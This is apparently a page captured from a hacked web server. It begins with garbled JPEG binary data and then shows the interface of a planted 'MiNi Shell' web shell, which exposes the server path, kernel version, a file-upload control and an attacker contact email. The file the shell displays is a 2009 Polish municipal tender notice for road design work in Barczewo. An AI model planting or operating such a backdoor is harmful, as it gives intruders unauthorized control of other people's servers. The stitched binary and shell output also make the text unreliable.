JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/9282-N-2009.html

<p class="kh_header"><b>Barczewo: opracowanie kompletnej dokumentacji projektowo-kosztorysowej dla robót budowlanych polegających na budowie drogi gminnej w obrębie Wójtowo, Nikielkowo.</b><br>
<b>Numer ogłoszenia: 9282 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Barczewo , Plac Ratuszowy 1, 11-010 Barczewo, tel. 089 5148664.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie kompletnej dokumentacji projektowo-kosztorysowej dla robót budowlanych polegających na budowie drogi gminnej w obrębie Wójtowo, Nikielkowo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.    Zakres prac obejmuje:

opracowanie kompletnej dokumentacji projektowo-kosztorysowej dla robót budowlanych polegających na budowie drogi gminnej w obrębie Wójtowo, Nikielkowo.

Dokumentacja projektowo-kosztorysowa składać się ma z wyodrębnionych dwóch etapów:

I etap: obręb Wójtowo obejmuje ulice: Wrzosowa, Kwiatowa, Akacjowa, Jaśminowa - wg. załączonego rysunku (wariant II).
II etap: obręb Nikielkowo obejmuje działki wg. załączonego rysunku (wariant II).

W terenie zabudowanym należy zaprojektować jezdnię wraz z chodnikiem (w razie możliwości dwustronnym) wraz z jej infrastrukturą techniczną  i urządzeniami tj. np. skrzyżowania. Projektowane parametry techniczne drogi należy dostosować odpowiednio do jej planowanej klasy (KD i KL) zgodnie z warunkami ustalonymi w decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID). Należy też przewidzieć ewentualną przebudowę kolidujących z projektowaną drogą linii kablowych i rurociągów.

Założenia do projektowania:
Kategoria projektowanych dróg - KD i KL
Długość projektowanej drogi  (?) 2 800m

Zakres rzeczowy opracowań:

a)	koncepcji projektowej - 1 egz. w terminie do 3 m-cy od daty podpisania niniejszej umowy. Na sporządzoną koncepcję należy uzyskać pisemną akceptację Zamawiającego. Koncepcja zakładać ma dwuwariantowość wykonania drogi: w technologii betonu i asfaltu. Przy czym należy sporządzić też kalkulacje kosztów (osob-no dla każdego wariantu) wybudowania drogi i jej eksploatacji przez okres 30 lat. Sporządzona koncepcja  projektowa musi zawierać projektowane rzędne drogi i jej profile. W przypadku upływu powyższego terminu i niewykonania w/w opracowania zamawiający może odstąpić od niniejszej umowy zachowując prawo do naliczenia wykonawcy kary, w wysokości 5% wartości brutto umowy.
b)	kosztorysu inwestorskiego w oparciu o rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funk-cjonalno-użytkowym [Dz. U. z 2004r. Nr 130, poz. 1389] w liczbie - 1 egz. (także w wersji elektronicznej na płycie CD)
c)	przedmiaru robót, przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania z ich szczegółowym opisem, miejscem wyko-nania lub wskazaniem podstaw  ustalających szczegółowy opis, z wyliczeniem i zestawieniem liczby jedno-stek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jed-nostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (paragraf 6-10) - w liczbie 1 egz. (także w wersji elektronicznej na płycie CD)
d)	projektu budowlanego wraz z niezbędnymi uzgodnieniami (w tym ZUDP) umożliwiającymi uzyskanie po-zwolenia na budowę, o którym mowa w ustawie Prawo budowlane i spełniającego wymagania rozporzą-dzenia Ministra Infrastruktury  z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu bu-dowlanego (Dz. U. z dnia 10 marca 2003 r. Nr 120, poz 1133) w liczbie 4 egz. (także w wersji elektronicznej na płycie CD, format PDF pliki o maksymalnej objętości do 10 MB)
e)	projektu organizacji ruchu drogowego na czas wykonywania robót oraz projektu docelowej organizacji ru-chu wraz z decyzją zatwierdzającą.
f)	specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowanie spełniające wymagania określone w §13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wy-konania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego - w liczbie 1 egz. (także w wersji elektronicznej na płycie CD)
g)	informacji dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ) - w liczbie 1 egz. (także w wersji elektro-nicznej na płycie CD)
h)	opracowań wyjściowych niezbędnych do prawidłowego zaprojektowania przedmiotu zamówienia m.in. zak-tualizowanych map do celów projektowych, dokumentacji geologicznej, raportu oddziaływania na środowi-sko (jeśli zajdzie konieczność), uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej (przygo-towanej dla min. dwóch wariantów), decyzji środowiskowej oraz innych niezbędnych uzgodnień i dokumen-tów (w tym z właścicielami nieruchomości dla których przewiduje się wykupy pod poszerzenie pasa drogo-wego).

Prace projektowe należy wykonać uwzględniając wykonany wcześniej projekt budowlany kanalizacji sanitarnej w obrębie geodezyjnym Nikielkowo. Jeśli zajdzie konieczność przebudowy istniejącej w terenie infrastruktury technicznej, należy zaprojektować odpowiednią jej przebudowę.

Kompletna dokumentacja projektowo-kosztorysowa służyła będzie zamawiającemu do ubiegania się o środki unijne, stąd opisując przedmiot zamówienia należy używać cech technicznych i jakościowych zgodnych z wy-mogami art.29 i 30 uPzp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.   Ustala się wadium w wysokości:  4 200,00 PLN (słownie: cztery tysiące dwieście złotych), kasa Urzędu Mia-sta nie przyjmuje wpłat.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział  Wykonawcy, którzy spełniają następujące warunki: 

1. 1)	posiadają uprawnienia, wymagane ustawami, do wykonywania działalności i czynności w zakresie przedmiotu niniejszego zamówienia;
1. 2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponujemy potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia* lub przedstawią pisemne zobowiązanie innych pod-miotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania niniejszego zamówie-nia* ;
1. 3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia;
1 .4)      nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.

* niewłaściwe przekreślić [patrz załącznik Nr 5 do siwz]
2. Opis sposobu dokonania oceny spełnienia warunków udziału w przetargu:

2.0) Uprawnienia.
Wykonawca musi wykazać że posiada wymagane uprawnienia do wykonywania działalności i czynności w za-kresie wykonania przedmiotu zamówienia tzn., że profil wykonywanej przez niego działalności umożliwia jego prawidłowe wykonanie. Wymagane jest załączenie aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej [załącznik do oferty]

2.1) Potencjał kadrowy.
Wykonawca wskaże [załącznik Nr 3 do siwz] do wykonania niniejszego zamówienia obowiązkowo zespół Pro-jektowy, którego członkowie posiadają właściwe uprawnienia zawodowe do wykonania niniejszego zamówienia. oraz każdy z członków przynależeć do właściwej terytorialnie Izby Samorządu Zawodowego.

2.2) Doświadczenie.
Wykonawca musi wykazać [załącznik Nr 4 do siwz], że w ciągu ostatnich 5 lat przed dniem wszczęcia postę-powania, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej 2 roboty pro-jektowe odpowiadające swoim rodzajem (budowa, przebudowa, rozbudowa) i wartością na łączną kwotę 400 000,00 zł. brutto.

2.3) Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. X.3. przedmiotowego postępowania oświadczeń i dokumentów wg. formuły spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 3.1) Wraz z ofertą wypełnioną na formularzu ofertowo-cenowym, (obowiązkowo) należy złożyć: 

1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospo-darczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospo-darczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w celu potwierdze-nia, że profil wykonywanej przez niego działalności umożliwia prawidłowe wykonanie zamówienia;

2.    Wypełniony formularz ofertowo-cenowy [załącznik Nr 2 do siwz].

3.    Informację o osobach, które będą skierowane do wykonania zamówienia (Potencjał kadrowy) - [załącznik Nr 3 do siwz], z załączonym odpisem nadanych uprawnień zawodowych i zaświadczeniem o przynależno-ści do właściwej terytorialnie Izby Inżynierów Budownictwa (dotyczy Zespołu Projektowego), a w przypadku osób które uzyskały uprawnienia budowlane po dniu 1.01.1995r. - wypis z centralnego rejestru osób upraw-nionych, potwierdzonego przez GINB. 

4.   Informację o doświadczeniu zawodowym Wykonawcy (Doświadczenie) - [załącznik Nr 4 do siwz], z załą-czeniem dokumentu/dokumentów potwierdzających, że wymienione w informacji minimum 2 roboty projek-towe w zakresie budowy, przebudowy, rozbudowy dróg zostały wykonane należycie.
 
5.    Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania o udzielenie niniejszego zamówie-nia, na podstawie art. 24 ust.1 i ust.2 [ustawy Pzp], oraz o spełnieniu warunków określonych w art. 22 ust.1 [ustawy Pzp] - [załącznik Nr 5 do siwz].

6.    Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik.
	Wykonawca ma obowiązek załączenia do oferty oryginału dokumentu pełnomocnictwa lub jego kopii po-świadczonej notarialnie.

7.	Dowód wniesienia wadium - [załącznik do oferty]..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.barczewo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Barczewie
Plac Ratuszowy 1
11 - 010 Barczewo  
pok. Nr8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2009 godzina 10:00, miejsce: Urząd Miejski w Barczewie
Plac Ratuszowy 1
11 - 010 Barczewo  
pok. Nr8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com